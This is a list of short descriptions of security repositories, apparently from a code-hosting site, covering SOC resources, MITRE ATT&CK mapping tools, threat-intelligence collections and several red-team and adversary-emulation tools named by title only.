A collection of sources of documentation, as well as field best practices, to build/run a SOC
A web application that assists network defenders, analysts, and researchers in the process of mapping adversary behaviors to the MITRE ATT&CK® framework.
MAAD Attack Framework - An attack tool for simple, fast & effective security testing of M365 & Entra ID (Azure AD).
Repository created to share information about tactics, techniques and procedures used by threat actors. Initially with ransomware groups and evolving to other types of threats.
Halberd : Multi-Cloud Attack Platform
This repository contains indicators of compromise (IOCs) of our various investigations.
This repository contains cutting-edge open-source security notes and tools that will help you during your Red Team assessments.
A collection of intelligence about Log4Shell and its exploitation activity.
翻译 - 有关 Log4Shell 及其开发活动的情报集合。
A python app to predict Att&ck tactics and techniques from cyber threat reports
Generate a MITRE ATT&CK Navigator based on a list of CVEs. Database with CVE, CWE, CAPEC, and MITRE ATT&CK Techniques data is updated daily.
PoC showcasing new DarkGate Install Script retrieval technique via DNS TXT Record
Adversary emulation for EDR/SIEM testing (macOS/Linux)
This central repository is crafted for cybersecurity enthusiasts, researchers, and professionals aiming to advance their skills. It offers valuable resources for those focused on analyzing and underst...
A collection of commands, tools, techniques and procedures of the purplestorm ctf team.
Parsing some nokia SROS show outputs using ttp
Use the Prowl API to obtain IP Reputation, Techniques Tactics and Procedures, Indicators of Attacks and Indicators of Compromise related to a public IP.